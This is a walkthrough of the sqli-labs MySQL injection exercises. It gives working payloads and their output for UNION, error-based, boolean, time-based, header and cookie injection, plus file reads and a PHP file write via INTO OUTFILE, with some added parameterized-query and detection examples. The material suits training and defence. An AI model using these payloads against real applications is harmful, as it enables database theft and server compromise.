sqli-lab write-up


sqli-lab:1

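-- must be followed by a space, and that space must be URL-encoded or it will not be recognized in the URL, e.g. --%20. The URL-encoded form of # is %23.

Use order by to discover the number of columns.

Use union select to display the wanted data. When order by has no effect, or when order by is not at the end of the statement, union select can also be used to determine the number of columns. For example: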

mysql> SELECT * FROM users WHERE id =3 order by 55 or 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | Dummy    | p@ssword |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3 or 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | Dummy    | p@ssword |
|  1 | 2        | 1        |
+----+----------+----------+
2 rows in set (0.02 sec)

mysql> SELECT * FROM users WHERE id =3 union all select 1,2,3,4 or 2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

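This lesson is mainly about error-based injection through a string-type parameter.

SELECT * FROM users WHERE id='1'' LIMIT 0,1

1) Error: syntax to use near '' LIMIT 0,1' at line 1. From it, guess the likely SQL statement, trying string, numeric, string + numeric and so on: select login_name,login_passwd from users where id='input id' limit 0,1;

'1'' LIMIT 0,1 fails because of the extra '. Trying 1\' may produce no error and still return the correct result, because id='1 union all' is handled as id='1'; this handling is done by the database.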

mysql> desc users;
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| id       | int(3)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(20) | NO   |     | NULL    |                |
| password | varchar(20) | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.10 sec)

mysql> select * from users where id ='33';
Empty set (0.00 sec)

mysql> select * from users where id ='3 union all ';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | Dummy    | p@ssword |
+----+----------+----------+
1 row in set, 1 warning (0.00 sec)
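
The row and the warning above come from MySQL comparing the string with the INT column numerically and keeping only its leading numeric prefix. The sketch below is an added example, not part of the original write-up or of sqli-labs: the helper names are hypothetical, the coercion is a simplified model (plain integers and decimals only), the sample rows are constructed, and strict_id shows the check an application can apply before the value reaches a query.

```python
import re

# Simplified model of how MySQL turns a string into a number when it is
# compared with a numeric column: leading whitespace is skipped, the longest
# numeric prefix is kept, and the rest is dropped with a warning.
_NUMERIC_PREFIX = re.compile(r"\s*([+-]?(?:\d+\.?\d*|\.\d+))")

def mysql_numeric_prefix(value: str) -> float:
    m = _NUMERIC_PREFIX.match(value)
    return float(m.group(1)) if m else 0.0

def loose_lookup(rows, raw_id):
    """Rows that WHERE id='<raw_id>' matches on an INT column (modelled)."""
    wanted = mysql_numeric_prefix(raw_id)
    return [r for r in rows if r["id"] == wanted]

_STRICT_ID = re.compile(r"[0-9]{1,9}")

def strict_id(raw_id: str) -> int:
    """Accept only a plain decimal id; reject everything else up front."""
    if not _STRICT_ID.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)

# Constructed sample rows mirroring the users table shown above.
USERS = [{"id": 1, "username": "Dumb"}, {"id": 3, "username": "Dummy"}]

if __name__ == "__main__":
    for raw in ("33", "3 union all ", "3"):
        print(repr(raw), "->", loose_lookup(USERS, raw))
    try:
        strict_id("3 union all ")
    except ValueError as exc:
        print("rejected:", exc)
```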

Why does union all still output the original row?

mysql> SELECT username FROM users WHERE id='1' union all select version();
+------------------+
| username         |
+------------------+
| Dumb             |
| 5.5.38-0+wheezy1 |
+------------------+

Note: add limit 1,1 to read only the second row. union all merges the rows of both queries, duplicate rows included.

sqli-lab:2

A few words on:

' LIMIT 0,1

SQL template:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

String-type injection: ?id=1\ gives the error: near ''1\' LIMIT 0,1' at line 1

?id=1' gives the error: near ''1'' LIMIT 0,1' at line 1

Numeric-type injection:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

?id=1' gives the error: near '' LIMIT 0,1' at line 1

?id=1\ gives the error: near '\ LIMIT 0,1' at line 1

sqli-lab:3

?id=1'

near ''1'') LIMIT 0,1' at line 1

?id=1\

near ''1\') LIMIT 0,1' at line 1. Looking at the right side of '1\') LIMIT 0,1, one can guess that the wrapper is ('

Likely SQL statement: select name,passwd from users where id = ('$id');

Actual SQL:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

sqli-lab:4

?id=1\

near '"1\") LIMIT 0,1' at line 1. In "1\") LIMIT 0,1, look at what follows the input on the right.

?id=1"

near '"1"") LIMIT 0,1' at line 1

Likely SQL statement: select name,passwd from users where id = ("$id");

Exploit statement: http://192.168.229.138/sqli-labs/Less-4/?id=1") union all select 1,2,3 limit 1,1 --+ or change the id to a value that does not exist, e.g. 9999") union all select 1, current_user,3

Actual statement:

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

?id=99") union all select 1,2,table_name from information_schema.tables where table_schema='security' --+ (table_schema selects the database by name)

?id=99") union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ (group_concat joins the values of the column, so there is no need to query them one by one with limit 0,1; limit 1,2; this returns all the table names at once)

?id=99") union all select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' --+ (then get the column names from the table name; with that, the whole system is clear)

database(),information_schema.tables (table_schema),information_schema.columns (table_name) 

Lessons 1 to 4 all use union to discover data.
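
The lessons so far differ only in the characters wrapped around $id, so one fix covers all of them: stop building the statement by concatenation. This is an added example, not code from the original write-up or from the sqli-labs source; Python's sqlite3 stands in for PHP/MySQL, the rows and inputs are constructed, and the ("$id") shape is left out because SQLite treats double quotes differently.

```python
import sqlite3

# The statement shapes quoted above for the string, numeric and ('$id') cases.
TEMPLATES = {
    "string":  "SELECT * FROM users WHERE id='{}' LIMIT 0,1",
    "numeric": "SELECT * FROM users WHERE id={} LIMIT 0,1",
    "paren":   "SELECT * FROM users WHERE id=('{}') LIMIT 0,1",
}
# Constructed inputs in the shape used on this page: a non-existent id, the
# closing characters for that template, then a UNION of three literals.
INPUTS = {
    "string":  "99' union all select 1,2,3 -- ",
    "numeric": "99 union all select 1,2,3 -- ",
    "paren":   "99') union all select 1,2,3 -- ",
}

def make_db():
    """In-memory table with constructed rows shaped like the lab's users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?)",
                   [(1, "Dumb", "constructed"), (3, "Dummy", "p@ssword")])
    return db

def concatenated(db, shape, user_input):
    """Before: the input is pasted into the SQL text, as in the lab source."""
    return db.execute(TEMPLATES[shape].format(user_input)).fetchall()

def bound(db, user_input):
    """After: the input travels as a parameter and is never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                      (user_input,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for shape, payload in INPUTS.items():
        print(shape, concatenated(db, shape, payload), bound(db, payload))
```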

sqli-lab:5

?id=1\

near ''1\' LIMIT 0,1' at line 1                 '1\' LIMIT 0,1

Because the page does not display the username and password and only tells you that you are in, error-based injection can be used.

?id=9' or 1=updatexml(1,concat(0x5e24,@@datadir,0x5e24),1) --+

0x5e24 must be given in full, otherwise part of the output goes missing.

XPATH syntax error: '^$/var/lib/mysql/^$'

?id=1' and 1=updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database()),0x5e24),1) --+

This fails with a "more than one row" error; group_concat can be used, e.g.:

?id=1' and 1=updatexml(1,concat(0x5e24,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5e24),1) --+

Column lookup:

?id=1' and 1=updatexml(1,concat(0x5e24,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5e24),1) --+

sqli-lab:6

1) Raising an error with rand(). Conditions: count(*), floor(rand()*2), group by; all four conditions are required. Now build it up:

select database();

select concat(0x2f,0x2f,(select database())); wrapping it in () means its result is used

select concat(0x2f,0x2f,(select database()),floor(rand()*2))a from information_schema.tables group by a

select 1 from (xxxx)b;

During testing, running it several times sometimes succeeds and sometimes fails, as shown below:

mysql>  select count(*), concat(      (select version()),floor(rand()*11)      )a from information_schema.schemata group by a;
ERROR 1062 (23000): Duplicate entry '5.5.38-0+wheezy13' for key 'group_key'

mysql>  select count(*), concat((select version()),floor(rand()*11))a from information_schema.schemata group by a;
+----------+-------------------+
| count(*) | a                 |
+----------+-------------------+
|        1 | 5.5.38-0+wheezy10 |

2) Using extractvalue

?id=1' and 1=extractvalue(1,concat(0x5e24,(select user()))) --+

Result:

XPATH syntax error: '^$root@localhost'

3) name_const

mysql> select * from (select name_const(version(),1),name_const(version(),1) as a)b
    -> ;
+------------------+------+
| 5.5.38-0+wheezy1 | a    |
+------------------+------+
|                1 |    1 |
+------------------+------+
1 row in set (0.00 sec)

mysql> (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as xx)
    -> ;
ERROR 1060 (42S21): Duplicate column name '5.5.38-0+wheezy1'

Wrap the select in parentheses:

?id=1" and 1=(select * from (select name_const(version(),1), name_const(version(),1))b) --+

Duplicate column name '5.5.38-0+wheezy1'

select(password)from(users); switching to * does not work yet

select/**/*/**/from/**/users;

mysql> insert into users(username,password) values('admin4                                                                   x','password');
Query OK, 1 row affected, 1 warning (0.03 sec)

mysql> select * from users where username='admin4';
+----+----------------------+----------+
| id | username             | password |
+----+----------------------+----------+
| 14 | admin4               | admin4   |
| 15 | admin4               | password |

select * from users where username='admin4' union all select 1,2,load_file('/etc/passwd');

updatexml, extractvalue and name_const all limit the number of characters returned; union has no such limit.

 select load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))

sqli-lab7 

Exporting a file

?id=1')) union all select NULL,NULL,0x3c3f70687020706870696e666f28293f3e into outfile '/tmp/xx.php' --%20 %23

The exported file ends up owned by the mysql user, so this only works in locations where mysql has write permission.

root@kali:/var/www/sqli-labs/Less-7# ls -l /tmp/xx.php
-rw-rw-rw- 1 mysql mysql 36 Apr 24 23:37 /tmp/xx.php

sqli-lab9

select benchmark(5000,encode('hello','world')); the first argument is the number of executions, the second is the expression to execute.

?id=1' and benchmark(5000000,ENCODE('hello','world')) --%20

?id=1' and benchmark(5000000,(select md5('5'))) --%20

select performs an action; if its result is needed, it has to be wrapped in ().

?id=1' and sleep(5) --%20

?id=1' and (select if(1=1,sleep(5),null)) --%20 (takes a little over 5 s)

?id=1' and if(1=1,sleep(5),null) --%20 (takes a little over 5 s)

?id=1' and (select if(1=0,sleep(5),null)) --%20 (no delay)

sqli-lab10

?id=1" and if(1=1,sleep(4),null) --%20

?id=1" and (select if(1=1,sleep(4),null)) --%20

or (select if((select database())="security",sleep(2),null));

or (select if(database()="security",sleep(1),null));

or (select if(database() like "securit%",sleep(1),null));     

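select if((select table_name from information_schema.tables where table_name='users' limit 0,1) like 'use%'  ,sleep(1),null);

Summary:

From the very first error you can basically see the format of the assembled SQL statement and then complete it; if adding ' %23 makes the page behave as before, it is OK. The lessons then go from printing mysql_error, to only saying that there is a syntax error, to giving no hint at all. union select (rows are displayed) ---> updatexml, extractvalue, name_const (error output) -----> or 1=1 [the two responses differ] ------> select if(1=1,sleep(1),null) (nothing is shown at all, but the SQL injection is there)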
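
Seen from the logging side, the stages in this summary leave recognisable keywords in request fields. The following is an added example, not part of the original write-up: a small classifier over constructed request records that URL-decodes each field, also tries base64 (the cookie in lesson 21 is base64-encoded), and strips /**/ comments before matching; the rule and function names are hypothetical.

```python
import base64
import re
from urllib.parse import unquote, unquote_plus

# One rule per payload family from the summary, run on normalised input.
RULES = {
    "union": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "error": re.compile(r"\b(updatexml|extractvalue|name_const)\s*\(|floor\s*\(\s*rand\s*\("),
    "time": re.compile(r"\b(sleep|benchmark)\s*\("),
    "file": re.compile(r"\binto\s+(outfile|dumpfile)\b|\bload_file\s*\("),
}

def variants(value):
    """Yield the URL-decoded value and, when it is valid base64 text, its decoding."""
    yield unquote_plus(value)
    try:
        yield base64.b64decode(unquote(value), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        pass

def normalise(text):
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ used in place of spaces
    return re.sub(r"\s+", " ", text).lower()

def classify(value):
    hits = set()
    for variant in variants(value):
        norm = normalise(variant)
        hits.update(name for name, rule in RULES.items() if rule.search(norm))
    return sorted(hits)

def scan(request):
    """Map each request field (parameter, header, cookie) to the families it matches."""
    results = {field: classify(raw) for field, raw in request.items()}
    return {field: found for field, found in results.items() if found}

# Constructed request records; the values reuse payload shapes shown on this page.
SAMPLES = [
    {"id": "1"},
    {"id": "99%22)%20union/**/all/**/select%201,2,3%20--+"},
    {"User-Agent": "cc' or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1),'','') -- )"},
    {"id": "1' and if(1=1,sleep(5),null) --%20"},
    {"uname": base64.b64encode(b"admin') union all select 1,load_file('/etc/passwd'),3 #").decode()},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", scan(sample))
```

Keyword rules like these flag attempts in logs but do not replace parameterized queries, and the boolean stage of the summary (or 1=1) has no distinctive keyword for them to match.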

sqli-lab 11

uname=admin&passwd=password' union all select 1,(select group_concat(username) from users) --%20 &submit=Submit

sqli-lab 12

uname=admin&passwd=password") union all select 1,(select group_concat(username) from users) --%20 &submit=Submit

sqli-lab 13

uname=admin') or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&passwd=password')  --%20 &submit=Submit

uname=admin') or (select if(1=1,sleep(1),null)) --%20&passwd=password')  --%20 &submit=Submit

sqli-lab 14

uname=admin" or (select substr((select version()),1,1))='5' --%20&passwd=password&submit=Submit

sqli-lab 15

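uname=admin' and (select if(1=1,sleep(2),null))--%20&passwd=password&submit=Submit

select * from users where username='admin' or (select if(1=1,sleep(2),null)); also works

and, or and similar operators must be followed by an expression that is a result, not by a statement that computes one; select xx computes, and wrapping it in parentheses turns it into a result.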

sqli-lab 16

uname=admin&passwd=password") or (select if(1=1,sleep(2),null)) --%20&submit=Submit

sqli-lab 17

uname=admin&passwd=password' or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1) --%20&submit=Submit

sqli-lab 18

User-Agent: cc' or 1=updatexml(1,concat(0x5e24,version(),0x5e24),1),'','') -- )

sqli-lab 19:

referer:

' or 1=extractvalue(1,concat(0x3c,version(),0x3c)),'')#

' or 1=extractvalue(1,concat(0x5e24,version(),0x5e24)),'')#

sqli-lab 20:

Cookie:uname=admin' or 1=(select * from (select name_const(version(),1),name_const(version(),1))a group by a) --%20

Cookie: uname=admind' union all select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --%20

sqli-lab 21:

Cookie:

uname=YWRtaW4nKSB1bmlvbiBhbGwgc2VsZWN0IDEsbG9hZF9maWxlKCcvZXRjL3Bhc3N3ZCcpLDMgaW50byBvdXRmaWxlICcvdG1wL3h4LmxvZycgIw==

Lesson 22 is the same.

sqli-lab 23:

id=100' union all select 1,2,3 or '1'='1

SELECT * FROM users WHERE id='100' union all select 1,2,3 or '1'='1' LIMIT 0,1 (the parts in bold combined)

sqli-lab 24:

Create a new user named admin' --

